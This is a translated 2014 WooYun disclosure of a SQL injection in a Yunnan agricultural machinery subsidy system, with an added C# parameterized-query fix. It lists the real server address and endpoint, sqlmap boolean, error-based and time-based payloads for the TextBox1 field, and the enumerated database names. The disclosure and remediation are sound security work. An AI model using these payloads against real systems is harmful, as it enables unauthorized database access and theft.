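Vulnerability Summary

Bug ID: wooyun-2014-047782

Title: SQL injection in an information system of Yunnan Province

Vendor: Yunnan Province

Author: 【|→上善若水】

Submitted: 2014-01-03 17:41

Fixed: 2014-02-17 17:41

Disclosed: 2014-02-17 17:41

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]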

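Vulnerability Details

Disclosure status:

2014-01-03: Details reported to the vendor; awaiting vendor handling
2014-01-08: Vendor confirmed; details disclosed to the vendor only
2014-01-18: Details disclosed to core white hats and experts in related fields
2014-01-28: Details disclosed to regular white hats
2014-02-07: Details disclosed to intern white hats
2014-02-17: Details disclosed to the public

Brief description:

Details:

The Yunnan Province agricultural machinery purchase subsidy information management system has a POST SQL injection.
URL: http://116.52.13.46/dwhnjsy.asp
Only this one injection address was tested: http://116.52.13.46/ynnj2012/Application/QiYeTuiJjxs.aspx
POST data: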
Place: POST
Parameter: TextBox1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 8732=8732 AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4801=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4801=4801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(105)+CHAR(113)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4052=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
---
[16:43:38] [INFO] testing Microsoft SQL Server
[16:43:39] [INFO] confirming Microsoft SQL Server
[16:43:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
===========================================================================================================================================
available databases [12]:
[*] 13bt
[*] master
[*] model
[*] msdb
[*] njbt2012
[*] njgzbt
[*] njgzbt2013
[*] njgzbt2013test
[*] ReportServer
[*] ReportServerTempDB
[*] sheng_2009
[*] tempdb
===========================================================================================================================================
Database: njbt2012
[74 tables]
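There is a pangolin_test_table table in there, so someone else may have already paid a visit. The penetration test stops here, to avoid any misunderstanding!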

Proof of vulnerability:

Selection_002.png

Selection_003.png

Selection_006.png

Remediation:

Fix the code!

Copyright notice: when reposting, please credit the source 【|→上善若水】@乌云
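What "fix the code" looks like for the TextBox1 search field reported above, as an added example that is not part of the original report or the vendor's code: the concatenated query shape implied by the sqlmap payloads beside a parameterized ADO.NET version with LIKE wildcards escaped. The table `dbo.Dealers`, its columns, the 50-character limit and the class and method names are assumptions made for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

static class DealerSearch
{
    // Vulnerable shape (assumed): input lands inside a LIKE '%...%' literal,
    // so a single quote in TextBox1 ends the literal and the rest runs as SQL.
    public static string BuildUnsafe(string textBox1)
    {
        return "SELECT Id, Name FROM dbo.Dealers WHERE Name LIKE '%" + textBox1 + "%'";
    }

    // Escape LIKE metacharacters so user input only ever matches literally.
    // The backslash is replaced first because it is the ESCAPE character.
    public static string EscapeLike(string value)
    {
        return value.Replace("\\", "\\\\")
                    .Replace("%", "\\%")
                    .Replace("_", "\\_")
                    .Replace("[", "\\[");
    }

    // Hardened: the SQL text is constant; input travels only as a typed parameter.
    public static SqlCommand BuildSafe(SqlConnection conn, string textBox1)
    {
        string term = textBox1 ?? string.Empty;
        if (term.Length > 50)                       // assumed field limit
            throw new ArgumentException("search term too long");
        var cmd = new SqlCommand(
            "SELECT Id, Name FROM dbo.Dealers WHERE Name LIKE @pattern ESCAPE '\\'", conn);
        // Worst case every character is escaped: 2 * 50 + 2 wildcards = 102.
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 102).Value =
            "%" + EscapeLike(term) + "%";
        return cmd;
    }

    static void Main()
    {
        // Constructed input with the quote-breaking shape reported for TextBox1.
        string input = "%' AND 1=1 AND '%'='";
        Console.WriteLine(BuildUnsafe(input));      // input becomes part of the SQL
        using (var cmd = BuildSafe(null, input))    // no connection needed to inspect
        {
            Console.WriteLine(cmd.CommandText);     // identical for any input
            Console.WriteLine(cmd.Parameters["@pattern"].Value);
        }
    }
}
```

Running the application's database login with read-only rights on the tables it needs limits what any remaining injection point can reach.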


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-01-08 13:51

Vendor reply:

Latest status:

None